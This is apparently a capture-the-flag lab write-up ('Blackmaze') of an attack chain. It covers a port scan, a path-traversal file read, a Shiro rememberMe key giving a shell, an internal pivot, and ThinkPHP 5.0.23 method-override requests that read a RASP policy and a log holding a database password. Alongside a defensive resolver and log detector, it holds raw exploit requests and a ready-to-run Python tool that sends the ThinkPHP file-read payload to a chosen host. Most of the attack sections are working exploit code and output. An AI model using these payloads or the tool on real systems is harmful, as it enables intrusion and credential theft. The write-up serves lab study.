Blackmaze
1. Entry point: 8080
┌──(root㉿kali)-[~/Desktop/ChunQiu/blackmaze]
└─# fscan -h 39.98.109.229
[852ms] [*] open port 39.98.109.229:22
[883ms] [*] open port 39.98.109.229:8080
[884ms] [*] open port 39.98.109.229:8081
[5.6s] [*] WebTitle http://39.98.109.229:8080 code:302 len:0 title:(none) redirect: http://39.98.109.229:8080/login;jsessionid=1D34F65E9413D239BD685DE9E952937C
[6.2s] [*] WebTitle http://39.98.109.229:8080/login;jsessionid=1D34F65E9413D239BD685DE9E952937C code:200 len:8663 title:Login
Arbitrary file read via path traversal in the download endpoint (no normalisation of the path parameter):
http://39.98.109.229:8080/file/download?path=../../../../../../etc/passwd
Shiro rememberMe key, recovered via the file read above; it yields a shell as webapp:
Key n5RYm2z1V60+D+OiNLXksQ==
Reading the flag from that shell (the prompt is /tmp >):
/tmp > /usr/bin/base64 /flag | base64 -d
flag{16fc0d69-a7b9-0a5d-5ff6-8eab6776774f}
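The traversal in /file/download?path=... above is the whole entry point, so here is an added example (not code from the target application or from this write-up) showing the vulnerable join, the resolver that would have stopped it, and a detector that flags the same request in access logs. The base directory and the log lines are constructed assumptions.

```python
"""Path traversal in a download endpoint (/file/download?path=..., the 8080
entry point above): the vulnerable join, a hardened resolver, and a detector
over access-log lines.  Added example, not code from the target application;
the base directory and the log lines are constructed."""
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

BASE_DIR = "/srv/app/files"  # assumption: where the app keeps downloadable files


def vulnerable_join(base: str, user_path: str) -> str:
    """What the target evidently does: glue the parameter onto the base
    directory and open the result.  '../' segments walk out of base."""
    return os.path.join(base, user_path)


def safe_join(base: str, user_path: str) -> str:
    """Resolve the request against base and refuse anything that ends up
    outside it.  realpath() also follows symlinks, so a link inside base that
    points at /etc is rejected too."""
    base_real = os.path.realpath(base)
    # strip leading separators: os.path.join('/srv', '/etc/passwd') would discard base
    target = os.path.realpath(os.path.join(base_real, user_path.lstrip("/\\")))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PermissionError(f"refusing {user_path!r}: resolves to {target}")
    return target


# --- detection over web-server access logs -----------------------------------

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
DOTDOT_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def url_has_traversal(url: str) -> bool:
    """True if the `path` query parameter carries a '..' segment.  parse_qs()
    percent-decodes once; the extra unquote() catches double-encoded %252e%252e."""
    for raw in parse_qs(urlsplit(url).query).get("path", []):
        if DOTDOT_SEGMENT.search(unquote(raw)):
            return True
    return False


def suspicious_lines(lines):
    """Return the access-log lines whose request URL looks like a traversal."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and url_has_traversal(m.group(1)):
            hits.append(line)
    return hits


# Constructed sample log (combined log format); not from the target.
ACCESS_LOG = [
    '10.0.0.5 - - [20/Jan/2025:10:00:01 +0800] "GET /file/download?path=reports/q1.pdf HTTP/1.1" 200 4211',
    '10.0.0.9 - - [20/Jan/2025:10:00:07 +0800] "GET /file/download?path=../../../../../../etc/passwd HTTP/1.1" 200 1804',
    '10.0.0.9 - - [20/Jan/2025:10:00:09 +0800] "GET /file/download?path=..%252f..%252fetc%252fshadow HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    print(vulnerable_join(BASE_DIR, "../../../../../../etc/passwd"))
    try:
        safe_join(BASE_DIR, "../../../../../../etc/passwd")
    except PermissionError as e:
        print("blocked:", e)
    print(safe_join(BASE_DIR, "reports/q1.pdf"))
    for hit in suspicious_lines(ACCESS_LOG):
        print("ALERT", hit)
```

The check is done on the resolved real path, not on the raw string, so encoded or overlong `..` variants and symlinks are caught the same way; the stronger fix is to not accept a filesystem path from the client at all and serve files by an opaque id.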
webapp@Shiro:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1e:ec:a4 brd ff:ff:ff:ff:ff:ff
inet 172.22.10.22/24 metric 100 brd 172.22.10.255 scope global dynamic eth0
valid_lft 1892156245sec preferred_lft 1892156245sec
inet6 fe80::216:3eff:fe1e:eca4/64 scope link
valid_lft forever preferred_lft forever
webapp@Shiro:~$
Internal scan of 172.22.10.0/24 from the foothold:
172.22.10.3:   [22 80]          ThinkPHP RCE
172.22.10.154: [22 80]
172.22.10.22:  [22 8080 8081]   entry point, already compromised (Shiro + file read)
172.22.10.155: [22 80]
[+] PocScan http://172.22.10.3 poc-yaml-thinkphp5023-method-rce poc1
2. 172.22.10.3: ThinkPHP RCE
2.1. Arbitrary file read (filter[]=highlight_file through the method-override bug)
POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: 172.22.10.3
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 89
Connection: keep-alive
_method=__construct&method=GET&filter[]=highlight_file&server[REQUEST_METHOD]=/etc/passwd
2.1.1. RASP policy (read /opt/plugins/official.js)
POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: 172.22.10.3
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 102
Connection: keep-alive
_method=__construct&method=GET&filter[]=highlight_file&server[REQUEST_METHOD]=/opt/plugins/official.js
What the RASP plugin (official.js) hooks:
- command: blocks system/exec/passthru/proc_open/shell_exec/popen/pcntl_exec/assert
- putenv: blocks LD_PRELOAD/LD_AUDIT/GCONV_PATH
- eval_regex: action=ignore (not active!)
2.1.2. MySQL password (from the RASP alarm log)
POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: 172.22.10.3
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 114
Connection: keep-alive
_method=__construct&method=GET&filter[]=highlight_file&server[REQUEST_METHOD]=/opt/logs/alarm/alarm.log.2025-01-20
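The three requests in 2.1, 2.1.1 and 2.1.2 are the same primitive with a different path, so here is an added helper (my own code, not the write-up's tooling) that builds that body, sends it, and turns the highlight_file() HTML back into the file text. The target host, the paths and the sample response are assumptions taken from the write-up or constructed here.

```python
"""ThinkPHP 5.0.23 method-override file read (POST /index.php?s=captcha), the
request shape used in sections 2.1 to 2.1.2 above.  Added example, not the
write-up's own tooling.  Host, paths and the sample response are assumptions
taken from the write-up or constructed here."""
import html
import re
import sys
import urllib.request
from urllib.parse import urlencode

TARGET = "172.22.10.3"  # assumption: the ThinkPHP host from the write-up


def build_body(path: str) -> str:
    """Build the form body.  _method=__construct re-runs Request::__construct
    with attacker-controlled properties: filter[]=highlight_file registers a
    filter that ThinkPHP later applies to server[REQUEST_METHOD], so the
    framework ends up calling highlight_file(<path>) for us."""
    params = [
        ("_method", "__construct"),
        ("method", "GET"),
        ("filter[]", "highlight_file"),
        ("server[REQUEST_METHOD]", path),
    ]
    # keep [] and / literal so the body matches the raw requests above byte for byte
    return urlencode(params, safe="[]/")


def highlight_to_text(body: str) -> str:
    """highlight_file() returns HTML (<code><span style=...>...<br />...</code>,
    spaces as &nbsp;, '<' as &lt;).  Recover the original file text.  An empty
    string means no <code> block came back (unreadable path, or the call was
    blocked)."""
    m = re.search(r"<code[^>]*>(.*?)</code>", body, re.S)
    if not m:
        return ""
    chunk = re.sub(r"<br\s*/?>", "\n", m.group(1))   # line breaks
    chunk = re.sub(r"<[^>]+>", "", chunk)             # colour spans
    return html.unescape(chunk).replace("\xa0", " ").strip("\n")


# Constructed sample of a highlight_file('/etc/passwd') response (PHP 7 style).
SAMPLE_RESPONSE = (
    '<code><span style="color: #000000">\n'
    'root:x:0:0:root:/root:/bin/bash<br />'
    'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />'
    '</span>\n</code>'
)


def read_file(host: str, path: str, timeout: float = 10) -> str:
    """Send the request and return the file text (network; not run by the test)."""
    req = urllib.request.Request(
        f"http://{host}/index.php?s=captcha",
        data=build_body(path).encode(),
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return highlight_to_text(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET
    for p in sys.argv[2:] or ["/etc/passwd", "/opt/plugins/official.js"]:
        print(f"##### {p}")
        print(read_file(host, p) or "(no <code> block in response)")
```

Usage: `python3 tp_read.py 172.22.10.3 /opt/logs/alarm/alarm.log.2025-01-20`. The RASP policy read in 2.1.1 hooks command execution and putenv, not file reads, which is why highlight_file keeps working against the same host while the command functions do not.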
3. 172.22.10.154
22/tcp open ssh
80/tcp open http
4. 172.22.10.155
22/tcp open ssh
80/tcp open http
9501/tcp open unknown